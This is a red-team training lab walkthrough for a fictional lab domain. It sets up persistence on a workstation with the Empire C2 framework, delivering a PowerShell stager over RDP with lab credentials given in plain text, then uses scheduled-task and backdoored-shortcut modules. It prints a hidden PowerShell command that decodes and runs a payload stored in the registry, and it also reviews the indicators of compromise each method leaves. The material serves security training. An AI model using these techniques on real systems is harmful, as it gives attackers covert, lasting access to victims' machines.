Lab 3.4 - Persistence
Objectives
- Establish persistence on
wk01.draconem.corpwith two methods - Create a Scheduled Task using a persistence module
- Examine the Indicators of Compromise (IoC) from that module
- Create a shortcut, .lnk file, on the user's desktop
- Backdoor the shortcut, .lnk file, using a persistence module
In this lab we will establish persistence on the target system then take note of the IoCs that are created to establish that persistence.
TTPs Emulated in this Lab
- T1053.005 - Scheduled Task/Job: Scheduled Task
- T1547.009 - Shortcut Modification
- T1204.001 - User Execution: Malicious Link
Preparation
Preparation Steps
Ensure you are connected to the VPN and can ping from the Slingshot Linux VM to the draconem.io website.
Open a terminal on Slingshot. Connect to the VPN with openvpn and take note of your ip address:
sudo openvpn ~/Desktop/sec565-labs-range.ovpn
Ctrl+Shift+t to open a new terminal tab, then run the following command to create four ICMP packets :
ping -c 4 draconem.io
If you get a successful ping, then curl the website. The ping tests icmp while the curl tests dns, tcp, and http.
curl draconem.io | head

On Your Own
1. Create an Empire listener
2. Create a PowerShell stager
3. Execute stager on wk01.draconem.io
4. Establish persistence with Scheduled Tasks
5. Examine IoCs
6. Create Shortcut to backdoor
7. Establish persistence with backdoored .LNK
8. Examine IoCs
9. Review the walkthrough
Walkthrough
Launch Empire and Starkiller
1. Launch Empire and start an http listener on port 8080 for your tun0 interface. If you run into any issues refer back to Lab 2.1 - C2 Introduction with Empire
Create PowerShell Stager
2. Create an Empire stager. Click on the suitcase icon
on the left navigation window to bring up the Stagers dashboard. Then click CREATE in the upper right.
Select multi/launcher in the drop down menu. Then provide the following values:
- StarkillerName:
interactive-http-pwsh - Listener:
interactive-http - Language:
powershell
Leave the rest as defaults and click the SUBMIT button in the upper right corner of the screen.

Operational Security
3. For the sake of time and to remove barriers, this lab will have you RDP directly to the target system with user credentials discovered in a previous lab. In real engagements you would take the following into consideration.
- RDP will not be accessible directly to workstations from outside the network
- A redirector must be used
- Interaction with wk01 should go through a pivot, but then outbound connections can be go direct to the redirector
Execute Stager on wk01.draconem.io
4. Deliver your stager to wk01.draconem.corp via RDP. Establish an RDP session to the wk01 Windows instance, using the credentials mark.goodwin : C@v3t3Dr@c0n3m!!. We will use xfreerdp on our Slingshot Linux VM with the clipboard plugin so that we can paste our stager into a command prompt. Once you get your agent, leave your RDP session open.
xfreerdp +clipboard /u:mark.goodwin /p:'C@v3t3Dr@c0n3m!!' /v:wk01.draconem.corp
On Slingshot, navigate to the Stagers dashboard, click the three vertical dots icon
under actions to bring up the actions menu. Click Copy to Clipboard. Then paste into a command prompt on the Windows system.

Establish Persistence with Scheduled Tasks
5. Interact with your agent, select powershell/persistence/userland/schtasks from the Execute Module drop down list. Then enter the following values:
- IdleTime:
10 - Listener:
interactive-http
Then click the SUBMIT button.

Examine IoCs
6. Now lets examine our indicators of compromise. Interact with your agent, select csharp/GhostPack/Seatbelt from the Execute Module drop down list. Then enter the following values:
- Command:
ScheduledTasks
Then click the SUBMIT button.
7. Examine the output and notice the new scheduled task was created. The task will execute PowerShell and the arguments are to pull a base64 blob from the registry. This should look suspicious to you! If it does, remember that it will look extra suspicious to a Defender.
====== ScheduledTasks ======
Non Microsoft scheduled tasks (via WMI)
Name : Updater
Principal :
GroupId :
Id : Author
LogonType : Network
RunLevel : TASK_RUNLEVEL_LUA
UserId : Mark.Goodwin
Author : DRACONEM\Mark.Goodwin
Description :
Source :
State : Ready
SDDL :
Enabled : True
Date : 3/19/2022 8:01:39 PM
AllowDemandStart : True
DisallowStartIfOnBatteries : True
ExecutionTimeLimit : PT72H
StopIfGoingOnBatteries : True
Actions :
------------------------------
Type : MSFT_TaskAction
Arguments : -NonI -W hidden -c "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))"
Execute : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
------------------------------
Triggers :
------------------------------
Type : MSFT_TaskIdleTrigger
Enabled : True
StartBoundary : 2022-03-19T20:01:00
StopAtDurationEnd : False
------------------------------
8. Now let's look at that registry value. Interact with your agent, select csharp/SharpSploit.Enumeration/GetRegistryKey from the Execute Module drop down list. Then enter the following values:
- RegPath:
HKCU:\Software\Microsoft\Windows\CurrentVersion\debug
Then click the SUBMIT button.
9. Examine the output and notice the base64 blob, let's take a deeper look with the command line. Run the following in a terminal on Slingshot Linux.
echo <Registry Value> | base64 -d
echo <Still encoded value> | base64 -d

10. The take away here, is that in order to establish this type of persistence in userland, you have to leave some IoCs behind. Check your operational security posture and weigh the risks and benefits of establishing this persistence. If you do create IoCs, they must be documented by the team and removed at the end of the engagement, if not sooner.
Tip
Red Team Tip: Don't use default values in Red Team engagements. This module's defaults should be signatured by more mature organizations because the TTP is widely used and publicly available. Changing the defaults doesn't always get around security tools but it can help tremendously!
Create Shortcut to Backdoor
11. In your RDP session, Right Click on the Desktop -> New -> Shortcut.

Then enter the following values for the shortcut:
- Type the location of the item:
C:\Program Files\internet explorer\iexplore.exe
Click Next.

- Type a name for this shortcut:
Internet Explorer
Click Finish.

12. Double Click the shortcut to verify that it works.
13. Download the .lnk file with your agent. Click the download icon
in Starkiller and enter the value \\fs01.draconem.corp\Folders$\mark.goodwin\Desktop\Internet Explorer.lnk. This is because our user profiles in Draconem get linked to the file share instead of the workstation to enable roaming profiles (a feature commonly observed in enterprises where users don't have a fixed workstation).
14. Examine the link with your terminal by navigating to your agent's download directory and finding the .lnk file. We will use strings to avoid non-printable characters, take note of the shortcut's destination and then make a copy of the original file.
cd /opt/Empire/empire/server/downloads/<%AGENTNAME%>
find . | grep -i .LNK
strings "./fs01.draconem.corp/Folders$/mark.goodwin/Desktop/Internet Explorer.lnk"
sudo mv "./fs01.draconem.corp/Folders$/mark.goodwin/Desktop/Internet Explorer.lnk" "./fs01.draconem.corp/Folders$/mark.goodwin/Desktop/Internet Explorer.lnk.orig"
Establish Persistence with Backdoored .LNK
15. Interact with your agent, select powershell/persistence/userland/backdoor_lnk from the Execute Module drop down list. Then enter the following values:
- LNKPath:
\\fs01.draconem.corp\Folders$\mark.goodwin\Desktop\Internet Explorer.lnk - Listener:
interactive-http
Then click the SUBMIT button.

Examine IoCs
16. Download the modified .lnk file with your agent. Click the download icon
and enter the value \\fs01.draconem.corp\Folders$\mark.goodwin\Desktop\Internet Explorer.lnk.
17. Examine the modified link with your terminal by navigating to your agent's download directory and finding the .lnk file. We will use strings to avoid non-printable ascii characters, take note of the PowerShell hijack in the target of the shortcut.
cd /opt/Empire/empire/server/downloads/<%AGENTNAME%>
find . | grep -i .LNK
strings "./fs01.draconem.corp/Folders$/mark.goodwin/Desktop/Internet Explorer.lnk"

18. The last thing for us to accomplish is to test the shortcut and take note of the IoC for later. Double Click the shortcut in your RDP session. You should see Internet Explorer launch and a new agent in Starkiller.
Conclusion
In this lab we deployed an agent onto wk01.draconem.corp using the credentials we discovered from a previous lab. We wanted to ensure we always have access to this system, we did this by establishing persistence in two different ways. Each method is not "opsec safe", meaning the TTP leaves behind IoCs that could be discovered by a Defender. In order to understand our tools and these techniques we examined the change to the target system after running the persistence modules.